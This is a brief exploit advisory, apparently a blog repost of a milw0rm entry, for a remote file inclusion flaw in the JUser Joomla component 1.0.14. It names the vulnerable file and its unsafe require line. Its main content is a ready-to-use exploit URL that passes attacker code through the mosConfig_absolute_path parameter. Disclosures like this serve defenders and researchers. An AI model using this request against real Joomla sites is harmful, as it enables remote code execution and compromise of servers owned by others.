JUser Joomla Component 1.0.14


[o] JUser Joomla Component 1.0.14 Remote File Include Vulnerability
Software : com_juser version 1.0.14 - paid component
Vendor   : www.joomlaequipment.com
Author   : NoGe


[o] Vulnerable file
administrator/components/com_juser/xajax_functions.php
require ($mosConfig_absolute_path.'/administrator/components/com_juser/xajax/xajax_core/xajax.inc.php');


[o] Exploit
http://localhost/path/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=[evilcode]


[o] Publish
http://milw0rm.com/exploits/4636

Research Blog

Search This Blog

LFI to RCE via access_log injection

JUser Joomla Component 1.0.14 - RFI

Comments